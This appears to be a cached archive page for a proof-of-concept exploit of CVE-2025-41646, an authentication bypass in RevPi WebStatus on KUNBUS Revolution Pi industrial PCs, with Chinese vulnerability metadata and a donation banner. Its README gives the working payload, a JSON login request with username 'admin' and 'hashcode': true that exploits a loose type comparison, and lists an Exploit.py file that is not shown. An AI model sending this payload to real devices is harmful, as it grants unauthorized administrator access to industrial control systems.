Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-41646 PoC — KUNBUS Revolution Pi 代码问题漏洞

Source
Associated Vulnerability
Title:KUNBUS Revolution Pi 代码问题漏洞 (CVE-2025-41646)
Description:KUNBUS Revolution Pi是KUNBUS公司的一款基于 Raspberry Pi 的开放式、模块化且经济高效的工业 PC。 KUNBUS Revolution Pi存在代码问题漏洞,该漏洞源于类型转换错误,可能导致身份验证绕过。
Description
CVE-2025-41646 - Critical Authentication bypass
Readme
# CVE-2025-41646---Critical-Authentication-Bypass-
CVE-2025-41646 - Critical Authentication bypass

# 🔓 CVE-2025-41646 - RevPi WebStatus Authentication Bypass PoC

A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as **admin** without valid credentials due to weak type comparison logic (`==` vs `===`).

---

## 📌 Affected

- RevPi WebStatus v2.4.5 and below
- Industrial/OT systems running on Raspbian with Apache

---

## 💥 Exploitation

Send a login request with:

```json
{
  "mode": "LOGIN",
  "username": "admin",
  "hashcode": true
}
File Snapshot

[4.0K] /data/pocs/edc6123ade7c5003031d6e2c53a0bf394c62f7de ├── [ 701] Exploit.py └── [ 624] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.